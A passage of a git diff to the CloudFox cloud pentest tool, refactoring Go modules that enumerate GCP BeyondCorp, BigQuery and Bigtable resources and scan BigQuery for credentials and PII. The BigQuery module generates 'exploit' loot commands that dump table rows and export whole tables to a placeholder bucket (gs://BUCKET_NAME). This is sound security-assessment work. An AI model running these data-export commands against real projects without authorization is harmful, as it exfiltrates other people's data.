+ } + for projectID := range m.ProjectAppConnections { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BeyondCorpOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } 
+} + +func (m *BeyondCorpModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + var tables []internal.TableFile + + if len(allConnectors) > 0 { + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(allConnectors), + }) + } + + if len(allConnections) > 0 { + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connections", + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(allConnections), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BeyondCorpOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 01b67fd7..d7b211a5 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -1,134 +1,485 @@ package commands import ( + "context" "fmt" - "time" + "strings" + "sync" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPBigQueryCommand = &cobra.Command{ - Use: "bigquery", - Aliases: []string{}, - Short: "Display 
Bigquery datasets and tables information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Bigquery datasets and tables resource information: -cloudfox gcp bigquery`, + Use: globals.GCP_BIGQUERY_MODULE_NAME, + Aliases: []string{"bq"}, + Short: "Enumerate GCP BigQuery datasets and tables with security analysis", + Long: `Enumerate GCP BigQuery datasets and tables across projects with security-focused analysis. + +Features: +- Lists all BigQuery datasets with security-relevant columns +- Shows tables within each dataset with encryption and type info +- Enumerates dataset access control entries (IAM-like) +- Identifies publicly accessible datasets (allUsers/allAuthenticatedUsers) +- Shows encryption status (Google-managed vs CMEK) +- Generates bq commands for data enumeration +- Generates exploitation commands for data access`, Run: runGCPBigQueryCommand, } -// GCPBigQueryResults struct that implements the internal.OutputInterface -type GCPBigQueryResults struct { - DatasetsData []BigQueryService.BigqueryDataset - TablesData []BigQueryService.BigqueryTable +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BigQueryModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectDatasets map[string][]BigQueryService.BigqueryDataset + ProjectTables map[string][]BigQueryService.BigqueryTable + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BigQueryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBigQueryCommand(cmd 
*cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &BigQueryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDatasets: make(map[string][]BigQueryService.BigqueryDataset), + ProjectTables: make(map[string][]BigQueryService.BigqueryTable), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + + // Get all data for stats + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() + + // Check results + if len(allDatasets) == 0 && len(allTables) == 0 { + logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(allDatasets), len(allTables)), globals.GCP_BIGQUERY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllDatasets returns all datasets from all projects +func (m *BigQueryModule) getAllDatasets() []BigQueryService.BigqueryDataset { + var all []BigQueryService.BigqueryDataset + for _, datasets := range m.ProjectDatasets { + all = append(all, datasets...) + } + return all +} + +// getAllTables returns all tables from all projects +func (m *BigQueryModule) getAllTables() []BigQueryService.BigqueryTable { + var all []BigQueryService.BigqueryTable + for _, tables := range m.ProjectTables { + all = append(all, tables...) 
+ } + return all } -// Define the format for CSV & JSON output -func (g GCPBigQueryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BigQueryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BigQuery in project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } - // For Datasets - datasetHeader := []string{"Name", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "Location", "ProjectID"} - var datasetBody [][]string - for _, dataset := range g.DatasetsData { - datasetBody = append(datasetBody, []string{ - dataset.Name, - dataset.DatasetID, - dataset.Description, - dataset.CreationTime.Format(time.RFC3339), - dataset.LastModifiedTime.Format(time.RFC3339), - dataset.Location, - dataset.ProjectID, - }) + // Create service and fetch data + bqService := BigQueryService.New() + result, err := bqService.BigqueryDatasetsAndTables(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERY_MODULE_NAME, + fmt.Sprintf("Could not enumerate BigQuery in project %s", projectID)) + return } - datasetTableFile := internal.TableFile{ - Header: datasetHeader, - Body: datasetBody, - Name: "bigquery-datasets", + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectDatasets[projectID] = result.Datasets + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } } - 
tableFiles = append(tableFiles, datasetTableFile) - // For Tables - tableHeader := []string{"TableID", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "NumBytes", "Location", "ProjectID"} - var tableBody [][]string - for _, table := range g.TablesData { - tableBody = append(tableBody, []string{ - table.TableID, - table.DatasetID, - table.Description, - table.CreationTime.Format(time.RFC3339), - table.LastModifiedTime.Format(time.RFC3339), - fmt.Sprintf("%d", table.NumBytes), - table.Location, - table.ProjectID, - }) + // Generate loot for each dataset and table + for _, dataset := range result.Datasets { + m.addDatasetToLoot(projectID, dataset) } - tableTableFile := internal.TableFile{ - Header: tableHeader, - Body: tableBody, - Name: "bigquery-tables", + for _, table := range result.Tables { + m.addTableToLoot(projectID, table) } - tableFiles = append(tableFiles, tableTableFile) + m.mu.Unlock() - return tableFiles + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d dataset(s) and %d table(s) in project %s", len(result.Datasets), len(result.Tables), projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } } -func (g GCPBigQueryResults) LootFiles() []internal.LootFile { - // Implement if there's specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BigQueryModule) addDatasetToLoot(projectID string, dataset BigQueryService.BigqueryDataset) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { + return + } + + // All commands for this dataset + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATASET: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Show dataset info\n"+ + "bq 
show --project_id=%s %s\n"+ + "bq show --format=prettyjson %s:%s\n\n"+ + "# List tables in dataset\n"+ + "bq ls --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) } -func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BIGQUERY_MODULE_NAME) +func (m *BigQueryModule) addTableToLoot(projectID string, table BigQueryService.BigqueryTable) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // Table info and query commands + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s.%s (Dataset: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Show table schema:\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Query first 100 rows:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ + "# Export table to GCS:\n"+ + "bq extract --project_id=%s '%s:%s.%s' gs://BUCKET_NAME/export_%s_%s.json\n\n", + table.DatasetID, table.TableID, table.DatasetID, + table.ProjectID, + table.TableType, table.NumBytes, table.NumRows, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + 
table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, + ) + + // Views (may expose data from other datasets) + if table.IsView { + viewQuery := table.ViewQuery + if len(viewQuery) > 200 { + viewQuery = viewQuery[:200] + "..." + } + lootFile.Contents += fmt.Sprintf( + "# VIEW DEFINITION: %s.%s\n"+ + "# Legacy SQL: %v\n"+ + "# Query:\n"+ + "# %s\n\n", + table.DatasetID, table.TableID, + table.UseLegacySQL, + strings.ReplaceAll(viewQuery, "\n", "\n# "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BIGQUERY_MODULE_NAME) + m.writeFlatOutput(ctx, logger) } +} - bqService := BigQueryService.New() - var datasetsResults []BigQueryService.BigqueryDataset - var tablesResults []BigQueryService.BigqueryTable - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving BigQuery datasets and tables from project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) - result, err := bqService.BigqueryDatasetsAndTables(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return +// getDatasetHeader returns the dataset table header +func (m *BigQueryModule) getDatasetHeader() []string { + return []string{ + "Project", + "Dataset ID", + "Location", + "Public", + "Encryption", + "IAM Binding Role", + "Principal 
Type", + "IAM Binding Principal", + } +} + +// getTableHeader returns the table table header +func (m *BigQueryModule) getTableHeader() []string { + return []string{ + "Project", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Rows", + "Public", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// datasetsToTableBody converts datasets to table body rows +func (m *BigQueryModule) datasetsToTableBody(datasets []BigQueryService.BigqueryDataset) ([][]string, int) { + var body [][]string + publicCount := 0 + for _, dataset := range datasets { + publicStatus := "" + if dataset.IsPublic { + publicStatus = dataset.PublicAccess + publicCount++ } - datasetsResults = append(datasetsResults, result.Datasets...) - tablesResults = append(tablesResults, result.Tables...) - cloudfoxOutput := GCPBigQueryResults{DatasetsData: datasetsResults, TablesData: tablesResults} + if len(dataset.AccessEntries) > 0 { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + role := entry.Role + if role == "" { + role = "READER" + } + body = append(body, []string{ + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + role, + memberType, + entry.Entity, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + "-", + "-", + "-", + }) + } + } + return body, publicCount +} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BIGQUERY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return +// tablesToTableBody converts tables to table body rows +func (m *BigQueryModule) tablesToTableBody(tables []BigQueryService.BigqueryTable) [][]string { + var body [][]string + for _, table := range tables { + 
publicStatus := "" + if table.IsPublic { + publicStatus = table.PublicAccess } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + + if len(table.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + "-", + "-", + }) + } else { + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + binding.Role, + member, + }) + } + } + } + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *BigQueryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectDatasets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectTables { + projectsWithData[projectID] = true + } + + totalPublicCount := 0 + for projectID := range projectsWithData { + datasets := m.ProjectDatasets[projectID] + tables := m.ProjectTables[projectID] + + datasetBody, publicCount := m.datasetsToTableBody(datasets) + totalPublicCount += publicCount + tableBody := m.tablesToTableBody(tables) + + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := 
m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryOutput{Table: tableFiles, Loot: lootFiles} + } + + if totalPublicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", totalPublicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BigQueryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() + + datasetBody, publicCount := m.datasetsToTableBody(allDatasets) + tableBody := m.tablesToTableBody(allTables) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", publicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + output := BigQueryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, 
len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/bigqueryenum.go b/gcp/commands/bigqueryenum.go new file mode 100644 index 00000000..7bbedfbf --- /dev/null +++ b/gcp/commands/bigqueryenum.go @@ -0,0 +1,279 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigqueryenumservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bqEnumSampleData bool + bqEnumMaxRows int + bqEnumMaxTables int +) + +var GCPBigQueryEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGQUERYENUM_MODULE_NAME, + Aliases: []string{"bq-enum", "bq-scan"}, + Short: "Scan BigQuery datasets, tables, and columns for sensitive data indicators", + Long: `Scan BigQuery metadata for potentially sensitive data. + +Phase 1 (always runs): Scans dataset names, table names, and column names +against sensitive data patterns (credentials, PII, financial, compliance). + +Phase 2 (opt-in): Samples data from flagged tables and scans content for +credentials, tokens, and other sensitive values. 
+ +Flags: + --sample-data Enable data sampling on flagged tables (default off) + --max-rows Maximum rows to sample per table (default 100) + --max-tables Maximum tables to scan per project (default 50)`, + Run: runGCPBigQueryEnumCommand, +} + +func init() { + GCPBigQueryEnumCommand.Flags().BoolVar(&bqEnumSampleData, "sample-data", false, "Sample data from flagged tables and scan content") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxRows, "max-rows", 100, "Maximum rows to sample per table") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxTables, "max-tables", 50, "Maximum tables to scan per project") +} + +type BigQueryEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigqueryenumservice.SensitiveBQResource + LootMap map[string]map[string]*internal.LootFile + SampleData bool + MaxRows int + MaxTables int + mu sync.Mutex +} + +type BigQueryEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigQueryEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERYENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigQueryEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigqueryenumservice.SensitiveBQResource), + LootMap: make(map[string]map[string]*internal.LootFile), + SampleData: bqEnumSampleData, + MaxRows: bqEnumMaxRows, + MaxTables: bqEnumMaxTables, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigQueryEnumModule) Execute(ctx context.Context, logger internal.Logger) { + mode := "metadata scan" + if m.SampleData { + mode = "metadata scan + data sampling" + } + logger.InfoM(fmt.Sprintf("Scanning BigQuery resources (%s, max %d tables per project)...", + mode, m.MaxTables), 
globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERYENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive BigQuery resources found", globals.GCP_BIGQUERYENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive BigQuery resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigQueryEnumModule) getAllResources() []bigqueryenumservice.SensitiveBQResource { + var all []bigqueryenumservice.SensitiveBQResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BigQueryEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning BigQuery in project: %s", projectID), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } + + svc := bigqueryenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID, m.MaxTables, m.SampleData, m.MaxRows) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERYENUM_MODULE_NAME, + fmt.Sprintf("Could not scan BigQuery in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigquery-enum-commands", + Contents: "# BigQuery Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + 
lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s.%s\n# %s\nbq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 10'\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, r.Table, + r.Description, + projectID, r.Dataset, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s\n# %s\nbq ls %s:%s\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, + r.Description, + projectID, r.Dataset, + ) + } + } + m.LootMap[projectID]["bigquery-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigQueryEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BigQueryEnumModule) getHeader() []string { + return []string{"Project", "Dataset", "Table", "Column", "Match Type", "Category", "Risk Level", "Description"} +} + +func (m *BigQueryEnumModule) resourcesToTableBody(resources []bigqueryenumservice.SensitiveBQResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Dataset, + r.Table, + r.Column, + r.MatchType, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigQueryEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigQueryEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + 
tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} + +func (m *BigQueryEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigQueryEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go new file mode 100644 index 00000000..ae1df557 --- /dev/null +++ b/gcp/commands/bigtable.go @@ -0,0 +1,439 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigtableservice 
"github.com/BishopFox/cloudfox/gcp/services/bigtableService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLE_MODULE_NAME, + Aliases: []string{"bt"}, + Short: "Enumerate Cloud Bigtable instances and tables", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables with IAM analysis. + +Features: +- Lists all Bigtable instances with instance-level IAM bindings +- Lists all tables with table-level IAM bindings +- Identifies publicly accessible instances and tables +- Shows cluster information per instance`, + Run: runGCPBigtableCommand, +} + +type BigtableModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]bigtableservice.BigtableInstanceInfo // projectID -> instances + ProjectTables map[string][]bigtableservice.BigtableTableInfo // projectID -> tables + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type BigtableOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLE_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]bigtableservice.BigtableInstanceInfo), + ProjectTables: make(map[string][]bigtableservice.BigtableTableInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, 
